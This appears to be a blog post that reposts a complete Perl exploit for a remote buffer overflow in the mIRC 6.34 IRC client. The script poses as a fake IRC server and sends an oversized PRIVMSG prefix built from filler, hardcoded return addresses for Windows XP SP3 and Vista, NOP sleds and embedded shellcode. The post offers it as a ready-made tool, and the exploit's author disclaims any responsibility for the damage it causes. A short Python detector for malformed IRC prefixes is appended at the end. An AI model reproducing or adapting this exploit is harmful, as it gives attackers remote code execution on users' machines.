mIRC 6.34 Remote Buffer Overflow Exploit Tool
I haven't posted vulnerability material for a long time; this blog has almost turned into a software blog. The reason is that my (Yehuo's) skills are too weak: many vulnerabilities I can't understand, and the ones I can't understand I'm too lazy to post, to avoid having too many people say I'm showing off.
But I can't just post nothing either. What I do post will inevitably be shallower in technical depth, or even need hardly any technique at all, such as a ready-made exploit tool, which is what this article is.
mIRC 6.34 Remote Buffer Overflow Exploit
#!/usr/bin/perl
#
#
# mIRC 6.34 Remote Buffer Overflow Exploit
# Exploit by SkD (skdrat <at> hotmail <.> com)
# ----------------------------------------
# A day's work of debugging and looking at mIRC.
#
# Tested on Windows XP SP3 English and Windows Vista SP0.
#
# Credits to securfrog for publishing the PoC.
#
# Author has no responsibility over the damage you do with this!
#
# Note: You might change the addresses for Vista ;)
#
# ----------------------------------------
use IO::Socket;

if(!($ARGV[1]))
{
    print "\n[x] mIRC 6.34 Remote Buffer Overflow Exploit\n";
    print "[x] Exploit by SkD (skdrat@ hotmail.com)\n";
    print "[x] Use: mirc_exp.pl <port> <OS = 1 for XP Sp3 AND 2 for Vista SP0>\n";
    print "[x] Example: mirc_exp.pl 6667 0\n";
    exit;
}

# Act as a fake IRC server on localhost and wait for a mIRC client to connect.
while(1)
{
    my $sock=new IO::Socket::INET (
        Listen    => 1,
        LocalAddr => '127.0.0.1',
        LocalPort => $ARGV[0],
        Proto     => 'tcp');
    die unless $sock;

    # win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
    my $shellcode =
    "\x2b\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1e".
    "\x95\x97\xf1\x83\xeb\xfc\xe2\xf4\xe2\x7d\xd3\xf1\x1e\x95\x1c\xb4".
    "\x22\x1e\xeb\xf4\x66\x94\x78\x7a\x51\x8d\x1c\xae\x3e\x94\x7c\xb8".
    "\x95\xa1\x1c\xf0\xf0\xa4\x57\x68\xb2\x11\x57\x85\x19\x54\x5d\xfc".
    "\x1f\x57\x7c\x05\x25\xc1\xb3\xf5\x6b\x70\x1c\xae\x3a\x94\x7c\x97".
    "\x95\x99\xdc\x7a\x41\x89\x96\x1a\x95\x89\x1c\xf0\xf5\x1c\xcb\xd5".
    "\x1a\x56\xa6\x31\x7a\x1e\xd7\xc1\x9b\x55\xef\xfd\x95\xd5\x9b\x7a".
    "\x6e\x89\x3a\x7a\x76\x9d\x7c\xf8\x95\x15\x27\xf1\x1e\x95\x1c\x99".
    "\x22\xca\xa6\x07\x7e\xc3\x1e\x09\x9d\x55\xec\xa1\x76\x65\x1d\xf5".
    "\x41\xfd\x0f\x0f\x94\x9b\xc0\x0e\xf9\xf6\xf6\x9d\x7d\x95\x97\xf1";

    print "[x] Listening on port ".$ARGV[0]."..\n";
    $s=$sock->accept();
    print "[x] Got a user!\n";

    # Filler, return addresses and NOPs that make up the oversized sender prefix.
    $overflow   = "\x41" x 307;
    $overflow2  = "B" x 12;
    $eip_vista  = "\x66\x1c\xc2\x76"; #Normaliz.DLL pop pop ret
    $eip2_vista = "\xd3\xdb\x54\x77"; #MSFCT.DLL jmp esp
    $eip_xpsp3  = "\xd1\xfb\x92\x77"; #SETUPAPI.DLL 0x7792FBD1 pop eax pop ret
    $eip2_xpsp3 = "\xb7\x87\x9d\x77"; #SETUPAPI.DLL 0x779D87B7 jmp esp
    $addr       = "\xb5\xb5\xfd\x7f";
    $nop_sled   = "\x90" x 4;
    $jmp        = "\xEB\x03\xFF\xFF";

    print "[x] Sending packets.. ";
    # A normal-looking 001 welcome first, then the PRIVMSG carrying the long prefix.
    print $s ":my_irc_server.com 001 wow :Welcome to the Internet Relay Network wow\n";
    sleep(1);
    if($ARGV[1] == "1"){
        print $s ":".$overflow.$eip_xpsp3.$addr.$nop_sled.$eip2_xpsp3.$nop_sled.$overflow2.$jmp.$nop_sled.$shellcode.$nop_sled." PRIVMSG wow : /FINGER wow.\n";
    }else{
        print $s ":".$overflow.$eip_vista.$addr.$nop_sled.$eip2_vista.$nop_sled.$overflow2.$jmp.$nop_sled.$shellcode.$nop_sled." PRIVMSG wow : /FINGER wow.\n";
    }
    print "[x] Check it out!\n";
}
# milw0rm.com [2008-10-04]
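As an added defensive check, not part of the original post and not code from mIRC or the exploit's author: the script above delivers its payload inside the sender prefix of a PRIVMSG line, so a client-side proxy or IDS can flag server lines whose prefix is implausibly long or contains bytes that no nick!user@host could hold. The sample lines are constructed, and the 128-byte prefix threshold is an assumption.

```python
import string

# RFC 2812 caps a full IRC line at 512 bytes including CRLF.  The script
# above builds a sender prefix of several hundred bytes and packs
# addresses and opcodes into it, so two cheap checks catch it: an
# implausibly long prefix, and bytes that never occur in a legitimate
# nick!user@host.  The 128-byte prefix threshold is an assumption.
MAX_LINE_LEN = 512
MAX_PREFIX_LEN = 128
PRINTABLE = set(string.printable) - set("\t\n\r\x0b\x0c")


def parse_irc_line(line: str):
    """Split one IRC line into (prefix, command, params); prefix is '' if absent."""
    line = line.rstrip("\r\n")
    prefix = ""
    if line.startswith(":"):
        head, _, line = line.partition(" ")
        prefix = head[1:]
    command, _, params = line.partition(" ")
    return prefix, command, params


def check_irc_line(raw: bytes) -> list:
    """Return a list of findings for one raw server line (empty = looks normal)."""
    findings = []
    if len(raw) > MAX_LINE_LEN:
        findings.append("line length %d exceeds %d" % (len(raw), MAX_LINE_LEN))
    # latin-1 maps every byte to one code point, so nothing is lost or rejected
    prefix, command, params = parse_irc_line(raw.decode("latin-1"))
    if len(prefix) > MAX_PREFIX_LEN:
        findings.append("prefix length %d exceeds %d" % (len(prefix), MAX_PREFIX_LEN))
    if any(ch not in PRINTABLE for ch in prefix):
        findings.append("non-printable bytes in prefix")
    return findings


# Constructed sample lines (not captured traffic).  The second one mimics the
# layout the script above sends: a long filler prefix followed by raw
# address/NOP bytes, then a PRIVMSG.
BENIGN = b":irc.example.net 001 wow :Welcome to the Internet Relay Network wow\r\n"
SUSPECT = b":" + b"A" * 307 + b"\x90\x90\xeb\x03" + b" PRIVMSG wow :hello\r\n"

if __name__ == "__main__":
    for line in (BENIGN, SUSPECT):
        print(line[:40], "->", check_irc_line(line) or "ok")
```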